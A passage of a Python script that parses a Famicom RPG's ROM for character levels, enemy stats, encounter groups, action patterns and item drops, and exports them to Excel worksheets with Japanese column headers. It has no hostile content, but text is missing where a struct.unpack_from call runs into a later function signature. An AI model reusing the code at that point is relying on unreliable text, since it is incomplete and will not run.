accumulated_experience_required: int\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacter:\n player_character_type: _PlayerCharacterType\n max_level: int\n levels: Sequence[_PlayerCharacterLevel]\n\n\ndef _get_player_character_max_level(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> int:\n prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x03C097,\n _PlayerCharacterType.WOLF: 0x03C09C,\n _PlayerCharacterType.RYUHIME: 0x03C098,\n _PlayerCharacterType.IWAN: 0x03C09A,\n _PlayerCharacterType.ONITAN: 0x03C09B,\n _PlayerCharacterType.HINOTORI: 0x03C09D,\n _PlayerCharacterType.SARUBOSS: 0x03C09E,\n _PlayerCharacterType.PENTA: 0x03C09F,\n _PlayerCharacterType.LUCKY: 0x03C0A0,\n }[player_character_type]\n return prg_rom_bytes[prg_rom_address]\n\n\ndef _get_player_character(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> _PlayerCharacter:\n status_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027713,\n _PlayerCharacterType.WOLF: 0x0278D5,\n _PlayerCharacterType.RYUHIME: 0x027A97,\n _PlayerCharacterType.IWAN: 0x027C59,\n _PlayerCharacterType.ONITAN: 0x027DF0,\n _PlayerCharacterType.HINOTORI: 0x027E4A,\n _PlayerCharacterType.SARUBOSS: 0x027EA4,\n _PlayerCharacterType.PENTA: 0x027EEC,\n _PlayerCharacterType.LUCKY: 0x027F46,\n }[player_character_type]\n experience_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027519,\n _PlayerCharacterType.WOLF: 0x02757D,\n _PlayerCharacterType.RYUHIME: 0x0275E1,\n _PlayerCharacterType.IWAN: 0x027645,\n _PlayerCharacterType.ONITAN: 0x002769F,\n _PlayerCharacterType.HINOTORI: 0x0276B3,\n _PlayerCharacterType.SARUBOSS: 0x0276C7,\n _PlayerCharacterType.PENTA: 0x0276D7,\n _PlayerCharacterType.LUCKY: 0x0276EB,\n }[player_character_type]\n max_level = _get_player_character_max_level(prg_rom_bytes, player_character_type)\n experience_unit_byte_size = 2\n status_unit_byte_size = 9\n accumulated_experience_required = 0\n player_character_levels = []\n for level in range(1, max_level + 1):\n status_offset = status_start_prg_rom_address + (level - 1) * status_unit_byte_size\n (hp, cp, attack, defense, speed, ten, shin, atama) = struct.unpack_from(\" _EnemyGroupPatternList:\n prg_rom_address = 0x00F704\n list_id = 0\n while list_id < enemy_group_pattern_list_id:\n if prg_rom_bytes[prg_rom_address] == 0xFF:\n list_id += 1\n prg_rom_address += 1\n enemy_group_pattern_ids = []\n while prg_rom_bytes[prg_rom_address] != 0xFF:\n enemy_group_pattern_ids.append(prg_rom_bytes[prg_rom_address])\n prg_rom_address += 1\n return _EnemyGroupPatternList(enemy_group_pattern_ids=tuple(enemy_group_pattern_ids))\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyGroupPattern:\n enemy_group_size: int\n enemy_group_0_size: int\n enemy_group_0_enemy_id: Optional[int]\n enemy_group_1_size: int\n enemy_group_1_enemy_id: Optional[int]\n enemy_group_2_size: int\n enemy_group_2_enemy_id: Optional[int]\n\n\ndef _get_enemy_group_pattern(prg_rom_bytes: bytes, enemy_group_pattern_id: int) -> _EnemyGroupPattern:\n assert 0 < enemy_group_pattern_id\n prg_rom_address = 0x00FA48\n pattern_id = 0\n while pattern_id < enemy_group_pattern_id:\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n if enemy_group_0_size != 0:\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n if enemy_group_1_size != 0:\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n if enemy_group_2_size != 0:\n prg_rom_address += 1\n pattern_id += 1\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n enemy_group_size = 0\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n enemy_group_0_enemy_id = None\n if enemy_group_0_size != 0:\n enemy_group_0_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n enemy_group_1_enemy_id = None\n if enemy_group_1_size != 0:\n enemy_group_1_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n enemy_group_2_enemy_id = None\n if enemy_group_2_size != 0:\n enemy_group_2_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n return _EnemyGroupPattern(\n enemy_group_size=enemy_group_size,\n enemy_group_0_size=enemy_group_0_size,\n enemy_group_0_enemy_id=enemy_group_0_enemy_id,\n enemy_group_1_size=enemy_group_1_size,\n enemy_group_1_enemy_id=enemy_group_1_enemy_id,\n enemy_group_2_size=enemy_group_2_size,\n enemy_group_2_enemy_id=enemy_group_2_enemy_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionId:\n action_ids: Sequence[int]\n\n\ndef _get_enemy_action_id(prg_rom_bytes: bytes, raw_action_id: int) -> _EnemyActionId:\n assert 1 <= raw_action_id\n start_prg_rom_address = 0x00FF93 + (raw_action_id - 1)\n action_id = prg_rom_bytes[start_prg_rom_address]\n if action_id < 0x80:\n return _EnemyActionId(action_ids=tuple([action_id]))\n action_id = (action_id << 1) & 0xFF\n return _EnemyActionId(\n action_ids=tuple(\n [\n prg_rom_bytes[0x00FFEE + action_id],\n prg_rom_bytes[0x00FFEE + action_id + 1],\n ]\n )\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionPattern:\n raw_action_id_0: int\n raw_action_id_1: int\n raw_action_id_2: int\n raw_action_id_3: int\n action_id_0: _EnemyActionId\n action_id_1: _EnemyActionId\n action_id_2: _EnemyActionId\n action_id_3: _EnemyActionId\n action_threshold_0: int\n action_threshold_1: int\n action_threshold_2: int\n action_threshold_3: int\n\n\ndef _get_enemy_action_pattern(prg_rom_bytes: bytes, enemy_action_pattern_id: int) -> _EnemyActionPattern:\n assert enemy_action_pattern_id <= 0x3F\n enemy_action_pattern_unit_byte_size = 8\n start_prg_rom_address = 0x00F442 + enemy_action_pattern_id * enemy_action_pattern_unit_byte_size\n enemy_action_pattern = _EnemyActionPattern(\n raw_action_id_0=prg_rom_bytes[start_prg_rom_address],\n raw_action_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n raw_action_id_2=prg_rom_bytes[start_prg_rom_address + 2],\n raw_action_id_3=prg_rom_bytes[start_prg_rom_address + 3],\n action_id_0=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address]),\n action_id_1=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 1]),\n action_id_2=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 2]),\n action_id_3=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 3]),\n action_threshold_0=prg_rom_bytes[start_prg_rom_address + 4],\n action_threshold_1=prg_rom_bytes[start_prg_rom_address + 5],\n action_threshold_2=prg_rom_bytes[start_prg_rom_address + 6],\n action_threshold_3=prg_rom_bytes[start_prg_rom_address + 7],\n )\n # Validate that the sum of the thresholds should be around 0xFF.\n assert 0xFA <= (enemy_action_pattern.action_threshold_0 + enemy_action_pattern.action_threshold_1 + enemy_action_pattern.action_threshold_2 + enemy_action_pattern.action_threshold_3) <= 0x100\n return enemy_action_pattern\n\n\ndef _aggregate_enemy_action_pattern(enemy_action_pattern: _EnemyActionPattern) -> Dict[int, int]:\n action_threshold_0 = enemy_action_pattern.action_threshold_0\n action_threshold_1 = enemy_action_pattern.action_threshold_1\n action_threshold_2 = enemy_action_pattern.action_threshold_2\n action_threshold_3 = 0x100 - (action_threshold_0 + action_threshold_1 + action_threshold_2)\n assert 0x00 <= action_threshold_3\n threshold_by_action_id: Dict[int, int] = collections.defaultdict(int)\n for action_id in enemy_action_pattern.action_id_0.action_ids:\n threshold_by_action_id[action_id] += action_threshold_0 * 2 // len(enemy_action_pattern.action_id_0.action_ids)\n for action_id in enemy_action_pattern.action_id_1.action_ids:\n threshold_by_action_id[action_id] += action_threshold_1 * 2 // len(enemy_action_pattern.action_id_1.action_ids)\n for action_id in enemy_action_pattern.action_id_2.action_ids:\n threshold_by_action_id[action_id] += action_threshold_2 * 2 // len(enemy_action_pattern.action_id_2.action_ids)\n for action_id in enemy_action_pattern.action_id_3.action_ids:\n threshold_by_action_id[action_id] += action_threshold_3 * 2 // len(enemy_action_pattern.action_id_3.action_ids)\n assert sum(threshold_by_action_id.values()) == 0x100 * 2, sum(threshold_by_action_id.values())\n return threshold_by_action_id\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ActionName:\n action_name_bytes: bytes\n action_name: str\n\n\ndef _get_action_name(prg_rom_bytes: bytes, action_id: int) -> _ActionName:\n if action_id == 0xEE:\n return _ActionName(\n action_name_bytes=b\"\",\n action_name=\"こうげき \",\n )\n action_name_unit_byte_size = 8\n start_prg_rom_address = 0x02634D + action_id * action_name_unit_byte_size\n action_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + action_name_unit_byte_size - 1]\n return _ActionName(\n action_name_bytes=action_name_bytes,\n action_name=_decode_string(action_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemDropPattern:\n drop_item_id_0: int\n drop_item_id_1: int\n item_drop_threshold: int\n\n\ndef _get_item_drop_pattern(prg_rom_bytes: bytes, item_drop_pattern_id: int) -> _ItemDropPattern:\n assert item_drop_pattern_id <= 0x3F\n item_drop_pattern_unit_byte_size = 3\n start_prg_rom_address = 0xF643 + item_drop_pattern_id * item_drop_pattern_unit_byte_size\n return _ItemDropPattern(\n drop_item_id_0=prg_rom_bytes[start_prg_rom_address],\n drop_item_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n item_drop_threshold=prg_rom_bytes[start_prg_rom_address + 2],\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemName:\n item_name_bytes: bytes\n item_name: str\n\n\ndef _get_item_name(prg_rom_bytes: bytes, item_id: int) -> _ItemName:\n assert 0x00 < item_id\n item_name_unit_byte_size = 8\n start_prg_rom_address = 0x026685 + item_id * item_name_unit_byte_size\n item_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + item_name_unit_byte_size - 1]\n return _ItemName(\n item_name_bytes=item_name_bytes,\n item_name=_decode_string(item_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyName:\n enemy_name_bytes: bytes\n enemy_name: str\n\n\ndef _get_enemy_name(prg_rom_bytes: bytes, enemy_id: int) -> _EnemyName:\n assert 0x00 < enemy_id\n enemy_name_unit_byte_size = 8\n start_prg_rom_address = 0x25AD5 + enemy_id * enemy_name_unit_byte_size\n enemy_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + enemy_name_unit_byte_size - 1]\n return _EnemyName(\n enemy_name_bytes=enemy_name_bytes,\n enemy_name=_decode_string(enemy_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Enemy:\n hp: int\n min_hp: int\n max_hp: int\n cp: int\n attack: int\n defense: int\n speed: int\n money: int\n experience: int\n escapable: bool\n attack_twice: bool\n hittability: int\n mihagito_endurance: bool\n kurusu_endurance: bool\n beto_endurance: bool\n choriki_endurance_1: int\n choriki_endurance_2: int\n choriki_endurance_3_4: int\n choriki_endurance_5: int\n choriki_endurance_6: int\n mahuuji_endurance: int\n mahuuji_effectiveness: int\n lullaby_endurance: int\n lullaby_effectiveness: int\n parapa_endurance: int\n parapa_effectiveness: int\n action_pattern_id: int\n item_drop_pattern_id: int\n\n\ndef _decode_enemy_value(enemy_data: Dict[int, int], y: int) -> int:\n assert 0 <= y\n value = ((enemy_data[0x6000] >> y) * 0x100 + enemy_data[0x6001 + y]) & 0x1FF\n bit_count = 0\n for i in range(5):\n ends_with_one = value & 0x01 != 0\n if ends_with_one:\n bit_count += 1\n value = (value >> 1) & 0xFF\n if not ends_with_one:\n break\n if bit_count == 0:\n return value\n elif bit_count <= 3:\n return (value + 1) * (10**bit_count)\n elif bit_count == 4:\n v = (value + 1) * 1000\n if (v & 0x6000) != 0:\n return 0xFFFF\n else:\n # エイりアンドー\n return 0x9C50\n raise ValueError(\"Invalid enemy_data.\")\n\n\ndef _calculate_enemy_hp_range(hp: int) -> Tuple[int, int]:\n diff = min(hp // 8, 0xFF)\n return (hp - diff, hp + diff)\n\n\ndef _get_enemy(prg_rom_bytes: bytes, enemy_id: int) -> _Enemy:\n assert 0 < enemy_id\n enemy_status_unit_byte_size = 0x14\n enemy_status_start_prg_rom_address = 0x00E1C2 + (enemy_id - 1) * enemy_status_unit_byte_size\n enemy_data: Dict[int, int] = {}\n for i in range(enemy_status_unit_byte_size):\n enemy_data[0x6000 + i] = prg_rom_bytes[enemy_status_start_prg_rom_address + i]\n experience = _decode_enemy_value(enemy_data, 0)\n hp = _decode_enemy_value(enemy_data, 1)\n (min_hp, max_hp) = _calculate_enemy_hp_range(hp)\n attack = _decode_enemy_value(enemy_data, 2)\n defense = _decode_enemy_value(enemy_data, 3)\n cp = _decode_enemy_value(enemy_data, 4)\n speed = _decode_enemy_value(enemy_data, 5)\n money = _decode_enemy_value(enemy_data, 6)\n escapable = (enemy_data[0x6008] & 0x04) == 0\n attack_twice = (enemy_data[0x6008] & 0x30) in (0x10, 0x20)\n hittability = (enemy_data[0x6008] & 0xC0) >> 6\n mihagito_endurance = (enemy_data[0x6008] & 0x08) != 0\n kurusu_endurance = not escapable\n beto_endurance = (enemy_data[0x6008] & 0x02) != 0\n # #$C0:属性2(火炎系)\n choriki_endurance_2 = (enemy_data[0x6009] & 0xC0) >> 6\n # #$C0:属性5(電撃系), #$30:属性3-4(水撃系・氷結系), #$0C:属性1(地震系), #$03:属性6(爆発系)\n choriki_endurance_5 = (enemy_data[0x600A] & 0xC0) >> 6\n choriki_endurance_3_4 = (enemy_data[0x600A] & 0x30) >> 4\n choriki_endurance_1 = (enemy_data[0x600A] & 0x0C) >> 2\n choriki_endurance_6 = enemy_data[0x600A] & 0x03\n mahuuji_endurance = (enemy_data[0x600B] & 0xC0) >> 6\n mahuuji_effectiveness = (enemy_data[0x600B] & 0x30) >> 4\n lullaby_endurance = (enemy_data[0x600B] & 0x0C) >> 2\n lullaby_effectiveness = enemy_data[0x600B] & 0x03\n parapa_endurance = (enemy_data[0x600C] & 0x0C) >> 2\n parapa_effectiveness = enemy_data[0x600C] & 0x03\n action_pattern_id = enemy_data[0x6009] & 0x3F\n item_drop_pattern_id = enemy_data[0x600D] & 0x3F\n return _Enemy(\n hp=hp,\n min_hp=min_hp,\n max_hp=max_hp,\n cp=cp,\n attack=attack,\n defense=defense,\n speed=speed,\n experience=experience,\n money=money,\n escapable=escapable,\n attack_twice=attack_twice,\n hittability=hittability,\n mihagito_endurance=mihagito_endurance,\n kurusu_endurance=kurusu_endurance,\n beto_endurance=beto_endurance,\n choriki_endurance_1=choriki_endurance_1,\n choriki_endurance_2=choriki_endurance_2,\n choriki_endurance_3_4=choriki_endurance_3_4,\n choriki_endurance_5=choriki_endurance_5,\n choriki_endurance_6=choriki_endurance_6,\n mahuuji_endurance=mahuuji_endurance,\n mahuuji_effectiveness=mahuuji_effectiveness,\n lullaby_endurance=lullaby_endurance,\n lullaby_effectiveness=lullaby_effectiveness,\n parapa_endurance=parapa_endurance,\n parapa_effectiveness=parapa_effectiveness,\n action_pattern_id=action_pattern_id,\n item_drop_pattern_id=item_drop_pattern_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Map:\n enemy_group_pattern_list_id: int\n encounter_threshold_id: int\n\n\ndef _get_map(prg_rom_bytes: bytes, map_id: int) -> _Map:\n map_unit_byte_size = 12\n start_prg_rom_address = 0x8004 + map_id * map_unit_byte_size\n v008F = prg_rom_bytes[start_prg_rom_address + 1]\n if v008F == 0x01:\n enemy_group_pattern_list_id = 0x78\n elif v008F == 0x02:\n enemy_group_pattern_list_id = 0x00\n else:\n v0091 = prg_rom_bytes[start_prg_rom_address + 3]\n enemy_group_pattern_list_id = v0091\n if enemy_group_pattern_list_id >= 0x9B:\n enemy_group_pattern_list_id = 0x01\n v0098 = prg_rom_bytes[start_prg_rom_address + 10]\n encounter_threshold_id = v0098 >> 5\n return _Map(enemy_group_pattern_list_id=enemy_group_pattern_list_id, encounter_threshold_id=encounter_threshold_id)\n\n\n_LEFT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"left\", vertical=\"top\")\n_RIGHT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"right\", vertical=\"top\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ColumnStyle:\n caption: str\n cell_alignment: openpyxl.styles.Alignment = _LEFT_ALIGNMENT\n\n\ndef _fill_worksheet_header_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle]) -> None:\n for column_index, header in enumerate(header_row, 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = header.caption\n\n\ndef _fill_worksheet_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle], row: List[Any]) -> None:\n for column_index, (header_column, column) in enumerate(zip(header_row, row), 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = column\n cell.alignment = header_column.cell_alignment\n\n\ndef _fill_player_character(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"キャラクター名\"),\n _ColumnStyle(caption=\"最大レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"守備\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"天の守り\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"芯の強さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"頭の良さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"前レベルからの必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"累積必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for player_character_type in _PlayerCharacterType:\n player_character = _get_player_character(prg_rom_bytes, player_character_type)\n for level in player_character.levels:\n row = [\n player_character.player_character_type.value,\n player_character.max_level,\n level.level,\n level.hp,\n level.cp,\n level.attack,\n level.defense,\n level.speed,\n level.ten,\n level.shin,\n level.atama,\n level.experience_required_from_previous_level,\n level.accumulated_experience_required,\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_chapter_name_of_enemy(enemy_id: int) -> str:\n # NOTE: This list may be incorrect.\n return {\n 0x01: \"ボス\", # ウシまつ\n 0x02: \"ボス\", # おおなまず\n 0x04: \"1の巻\", # どくまんじゅう\n 0x05: \"1の巻\", # レッドスネーク\n 0x06: \"1の巻\", # しろぼうず\n 0x07: \"1の巻\", # カマおとこ\n 0x08: \"ボス\", # まむしおとこ\n 0x09: \"1の巻\", # フライングバム\n 0x0A: \"1の巻\", # スカルバット\n 0x0B: \"1の巻\", # ダイキチ\n 0x0C: \"1の巻\", # へルラッツ\n 0x0D: \"1の巻\", # アッカンべー\n 0x0E: \"1の巻\", # へらへら\n 0x0F: \"1の巻\", # クモジン\n 0x10: \"1の巻\", # からくりマン\n 0x11: \"1の巻\", # ブラックマン\n 0x12: \"1の巻\", # かげにん\n 0x13: \"1の巻\", # にんけん\n 0x14: \"ボス\", # デビルクローン\n 0x15: \"2の巻\", # べムガー\n 0x16: \"2の巻\", # デスグりーン\n 0x17: \"2の巻\", # へルモンキー\n 0x18: \"2の巻\", # シェルビー\n 0x19: \"2の巻\", # へびおんな\n 0x1A: \"2の巻\", # ドラゴンマン\n 0x1B: \"2の巻\", # ぎょろん\n 0x1C: \"2の巻\", # メカタツノコ\n 0x1D: \"ボス\", # タツノコつかい\n 0x1E: \"ボス\", # うつぼうず\n 0x1F: \"3の巻\", # おおとげむし\n 0x20: \"3の巻\", # マグマンゼりー\n 0x21: \"3の巻\", # ひふきガメ\n 0x22: \"3の巻\", # べロべロべー\n 0x23: \"3の巻\", # ヒダシメ\n 0x24: \"3の巻\", # バットクルス\n 0x25: \"3の巻\", # かえんマン\n 0x26: \"3の巻\", # いんねび\n 0x27: \"ボス\", # かえんだいおう\n 0x28: \"4の巻\", # マッドボアー\n 0x29: \"4の巻\", # ひゃっかんいぬ\n 0x2A: \"4の巻\", # ウルフマン\n 0x2B: \"4の巻\", # りトルエイプ\n 0x2C: \"4の巻\", # しろやまた\n 0x2D: \"4の巻\", # へルバット\n 0x2E: \"4の巻\", # くらやみマン\n 0x2F: \"4の巻\", # シャドウマン\n 0x30: \"ボス\", # ムササビだゆう\n 0x31: \"5の巻\", # あまのじゃく\n 0x32: \"5の巻\", # クレイジーカウ\n 0x33: \"5の巻\", # レッドソーサー\n 0x34: \"5の巻\", # しにがみこぞう\n 0x35: \"5の巻\", # にんげんもどき\n 0x36: \"5の巻\", # バトルナイト\n 0x37: \"ボス\", # コウモりだゆう\n 0x38: \"6の巻\", # ララバイかめん\n 0x39: \"6の巻\", # スーパークロン\n 0x3A: \"6の巻\", # シャーぺイン\n 0x3B: \"6の巻\", # サソラム\n 0x3C: \"6の巻\", # コカーメン\n 0x3D: \"6の巻\", # カーメン\n 0x3E: \"6の巻\", # きがマン\n 0x3F: \"ボス\", # ビッグカンカン\n 0x40: \"6の巻\", # マッドミイラ\n 0x41: \"6の巻\", # ファラー\n 0x42: \"6の巻\", # スフインツク\n 0x43: \"ボス\", # ツタンだいおう\n 0x44: \"7の巻\", # パニュロン\n 0x45: \"7の巻\", # ガオウ\n 0x46: \"7の巻\", # アイスマン\n 0x47: \"7の巻\", # ひょうがんだん\n 0x48: \"7の巻\", # ガンテツゾンビ\n 0x49: \"7の巻\", # ゆきひめ\n 0x4A: \"7の巻\", # ダークへッド\n 0x4B: \"7の巻\", # ひょうけつマン\n 0x4C: \"7の巻\", # ひょうがコング\n 0x4D: \"ボス\", # だるまだいし\n 0x4E: \"8の巻\", # へルファイヤー\n 0x4F: \"8の巻\", # どろたぼう\n 0x50: \"8の巻\", # ゾンビー\n 0x51: \"8の巻\", # のろいひめ\n 0x52: \"8の巻\", # ゾンビコウモり\n 0x53: \"8の巻\", # メタルパラソル\n 0x54: \"8の巻\", # あしがるゾンビ\n 0x55: \"8の巻\", # のろいマン\n 0x56: \"8の巻\", # スカルホッパー\n 0x57: \"8の巻\", # ミステりーアイ\n 0x58: \"ボス\", # ゾンビまおう\n 0x59: \"8の巻\", # かねくいだま\n 0x5A: \"8の巻\", # ラーゴン\n 0x5B: \"8の巻\", # モスカルラ\n 0x5C: \"8の巻\", # ダンダン\n 0x5D: \"8の巻\", # キンゾー\n 0x5E: \"8の巻\", # ガキゾンビ\n 0x5F: \"8の巻\", # ブレインソーサ\n 0x60: \"ボス\", # ロボゴールド\n 0x61: \"1の巻\", # キノコング\n 0x63: \"9の巻\", # あかぼうず\n 0x64: \"9の巻\", # ダークネス\n 0x65: \"9の巻\", # まぼろしかめん\n 0x66: \"9の巻\", # ろくろ\n 0x67: \"9の巻\", # まそうりょ\n 0x68: \"9の巻\", # はんにゃ\n 0x69: \"9の巻\", # ドラゴルド\n 0x6A: \"ボス\", # バイオフラワー\n 0x6B: \"9の巻\", # マンイーター\n 0x6C: \"9の巻\", # フラワー\n 0x6D: \"10の巻\", # みらいマン\n 0x6E: \"10の巻\", # ジョックー\n 0x6F: \"10の巻\", # ミンミン\n 0x70: \"10の巻\", # アイアンアイ\n 0x71: \"10の巻\", # ガンダーロボ\n 0x72: \"10の巻\", # レイザータンク\n 0x73: \"ボス\", # ボスガンダー1\n 0x74: \"ボス\", # ボスガンダー2\n 0x75: \"10の巻\", # メガべルガー\n 0x76: \"10の巻\", # レガルゴ\n 0x77: \"10の巻\", # スカイキラー\n 0x78: \"ボス\", # エイりアンドー\n 0x79: \"ボス\", # キラーウルフ\n 0x7A: \"ボス\", # メタルブロック\n 0x7B: \"ボス\", # フライウイドウ\n 0x7C: \"ボス\", # サーべンラガー\n 0x7D: \"ボス\", # マインマスター\n 0x7E: \"オニガランド\", # クレイジーババ\n 0x7F: \"オニガランド\", # まへいもち\n 0x80: \"オニガランド\", # ドグウアーマー\n 0x81: \"オニガランド\", # へビオトコ\n 0x82: \"ボス\", # イヌゾンビ\n 0x83: \"オニガランド\", # あおぼうず\n 0x84: \"オニガランド\", # オニデーモン\n 0x85: \"オニガランド\", # マグマン\n 0x86: \"オニガランド\", # モンスタージジ\n 0x87: \"オニガランド\", # あおきし\n 0x88: \"オニガランド\", # オニタコン\n 0x89: \"ボス\", # サルボス\n 0x8A: \"オニガランド\", # シーサーぺント\n 0x8B: \"オニガランド\", # ブルーアンクル\n 0x8C: \"オニガランド\", # スネークポッド\n 0x8D: \"オニガランド\", # レッドドッグ\n 0x8E: \"オニガランド\", # ブルードッグ\n 0x8F: \"オニガランド\", # バンコパ\n 0x90: \"オニガランド\", # ピーチボーイズ\n 0x91: \"ボス\", # モモタロゾンビ\n 0x92: \"ボス\", # キラーウルフ\n 0x93: \"オーロラ王国\", # グりーンアイ\n 0x94: \"オーロラ王国\", # つるりん\n 0x95: \"オーロラ王国\", # へビーガル\n 0x96: \"オーロラ王国\", # スカイマン\n 0x97: \"オーロラ王国\", # クレバス\n 0x98: \"オーロラ王国\", # グりーンケルプ\n 0x99: \"オーロラ王国\", # イノクラッシュ\n 0x9A: \"オーロラ王国\", # アイスファイヤ\n 0x9B: \"オーロラ王国\", # べムカッター\n 0x9C: \"オーロラ王国\", # がいこつむし\n 0x9D: \"オーロラ王国\", # シャドーマスク\n 0x9E: \"オーロラ王国\", # カニモンス\n 0x9F: \"オーロラ王国\", # アイスストーン\n 0xA0: \"オーロラ王国\", # ゆきみアイス\n 0xA1: \"オーロラ王国\", # ブルーザウルス\n 0xA2: \"オーロラ王国\", # じんめんいわ\n 0xA3: \"オーロラ王国\", # エレキラドン\n 0xA4: \"オーロラ王国\", # ブビ\n 0xA5: \"オーロラ王国\", # キルスライダー\n 0xA6: \"ボス\", # メタルブロック\n 0xA9: \"2の巻\", # しきゃくマン\n 0xAA: \"ボス\", # キンタロゾンビ\n 0xAC: \"ボス\", # ウシまつ\n }.get(enemy_id, \"不明\")\n\n\ndef _fill_enemy(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵ID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵名前\"),\n _ColumnStyle(caption=\"初出\"),\n _ColumnStyle(caption=\"基礎命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最小命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"防御\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"獲得金\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"逃走\"),\n _ColumnStyle(caption=\"行動回数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"回避補正\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ミハギトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"クルスきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ベトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"地震系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"火炎系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"水撃系・氷結系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"電撃系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"爆発系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイ有効ターン数\", 